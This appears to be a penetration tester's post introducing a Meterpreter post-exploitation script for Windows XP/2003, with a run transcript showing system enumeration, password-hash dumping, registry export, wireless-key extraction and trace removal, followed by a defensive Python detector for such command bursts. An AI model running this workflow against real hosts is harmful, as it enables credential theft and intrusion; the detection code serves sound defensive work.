Guys, I recently made a small, quick-and-dirty Meterpreter script for enumerating and gathering all the typical information I tend to gather out of Windows 2003 and XP hosts after a compromise. Since in most engagements I'm not allowed to install any software on the target hosts, I made it so it will use Windows native command-line tools.

Here is a sample of running it; once a machine is exploited and Meterpreter is deployed, just type run winenum to launch the script:

meterpreter > run winenum 
[*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
[*] New session on
[*] Executing: set
[*] Executing: arp -a
[*] Executing: ipconfig /all
[*] Executing: ipconfig /displaydns
[*] Executing: route print
[*] Executing: net view
[*] Executing: netstat -na
[*] Executing: netstat -ns
[*] Executing: net share
[*] Executing: net view
[*] Executing: net group
[*] Executing: net user
[*] Executing: net localgroup
[*] Executing: net view /domain
[*] Executing: netsh firewall show config
[*] Executing: wmic computersystem list
[*] Executing: wmic useraccount list
[*] Executing: wmic group
[*] Executing: wmic service list brief
[*] Executing: wmic volume list brief
[*] Executing: wmic process list brief
[*] Executing: wmic startup list full
[*] Executing: wmic qfe
[*] Downloading WDSRB.txt to -> /tmp/
[*] Dumping password hashes...
[*] Exporting HKCU
[*] Compressing HKCU into cab file for faster download
[*] Exporting HKLM
[*] Compressing HKLM into cab file for faster download
[*] Exporting HKCC
[*] Compressing HKCC into cab file for faster download
[*] Exporting HKCR
[*] Compressing HKCR into cab file for faster download
[*] Exporting HKU
[*] Compressing HKU into cab file for faster download
[*] Downloading HKCU.cab to -> /tmp/
[*] Downloading HKLM.cab to -> /tmp/
[*] Downloading HKCC.cab to -> /tmp/
[*] Downloading HKCR.cab to -> /tmp/
[*] Downloading HKU.cab to -> /tmp/
[*] Removing anything we left behind...
[*] Done!

meterpreter >
And here is the code; you have to place it in /pentest/exploits/framework3/script/meterpreter/ and name it winenum.rb

Josh Wright from InGuardians published a great paper called Vista Wireless Power Tools on the new features of the Windows Vista wireless commands, plus published several tools. I added the enumeration commands to Winenum, plus it will now export the registry keys where the configured wireless networks of Windows XP and Windows Vista machines are stored; these files can be imported into the pentester's Windows box to gain access to the client's network or to get the wireless keys using other tools after importing.

Let me know if you like it.
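From the defender's side, the transcript above is a tight burst of native discovery commands spawned by one parent process, a pattern that process-creation telemetry can flag. The following is an added example, not part of this post or of winenum.rb: it scans constructed process-creation records for a parent that spawned five or more distinct commands from the list above within 60 seconds (the log format, ppid values, threshold and window are assumptions).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands the winenum transcript above runs back to back, reduced to
# "tool first-argument" so that "net user" and "net use" stay distinct.
ENUM_COMMANDS = {
    "arp -a", "ipconfig /all", "ipconfig /displaydns", "route print", "net view",
    "netstat -na", "netstat -ns", "net share", "net group", "net user",
    "net localgroup", "netsh firewall", "wmic computersystem", "wmic useraccount",
    "wmic group", "wmic service", "wmic volume", "wmic process", "wmic startup",
    "wmic qfe", "reg export",
}

# Constructed, simplified process-creation records (time, parent PID, command line).
# Real telemetry (Sysmon event ID 1, Windows event 4688) carries many more fields.
SAMPLE_LOG = """\
2009-03-01T10:00:00 ppid=1234 cmd=cmd.exe /c arp -a
2009-03-01T10:00:01 ppid=1234 cmd=cmd.exe /c ipconfig /all
2009-03-01T10:00:01 ppid=1234 cmd=cmd.exe /c route print
2009-03-01T10:00:02 ppid=1234 cmd=cmd.exe /c net user
2009-03-01T10:00:02 ppid=1234 cmd=cmd.exe /c wmic qfe
2009-03-01T10:00:03 ppid=1234 cmd=cmd.exe /c reg export HKLM hklm.reg
2009-03-01T10:05:00 ppid=777 cmd=cmd.exe /c ipconfig /all
2009-03-01T10:09:00 ppid=777 cmd=cmd.exe /c net user
"""

LINE_RE = re.compile(r"^(\S+) ppid=(\d+) cmd=(.*)$", re.M)

def normalize(cmdline):
    """Drop the cmd.exe /c wrapper and keep 'tool first-arg', lower-cased."""
    cmdline = re.sub(r"^cmd\.exe\s+/c\s+", "", cmdline.strip(), flags=re.I)
    parts = cmdline.lower().split()
    return " ".join(parts[:2])

def find_enum_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ppid: count} for parents whose children ran at least `threshold`
    distinct discovery commands inside any sliding window of length `window`."""
    events = defaultdict(list)
    for ts, ppid, cmd in LINE_RE.findall(log_text):
        cmd = normalize(cmd)
        if cmd in ENUM_COMMANDS:
            events[ppid].append((datetime.fromisoformat(ts), cmd))
    hits = {}
    for ppid, evs in events.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            seen = {c for t, c in evs[i:] if t - start <= window}
            if len(seen) >= threshold:
                hits[ppid] = max(hits.get(ppid, 0), len(seen))
    return hits
```

Tune the threshold and window against baseline administrator activity; the two commands from ppid 777 four minutes apart are deliberately below the bar.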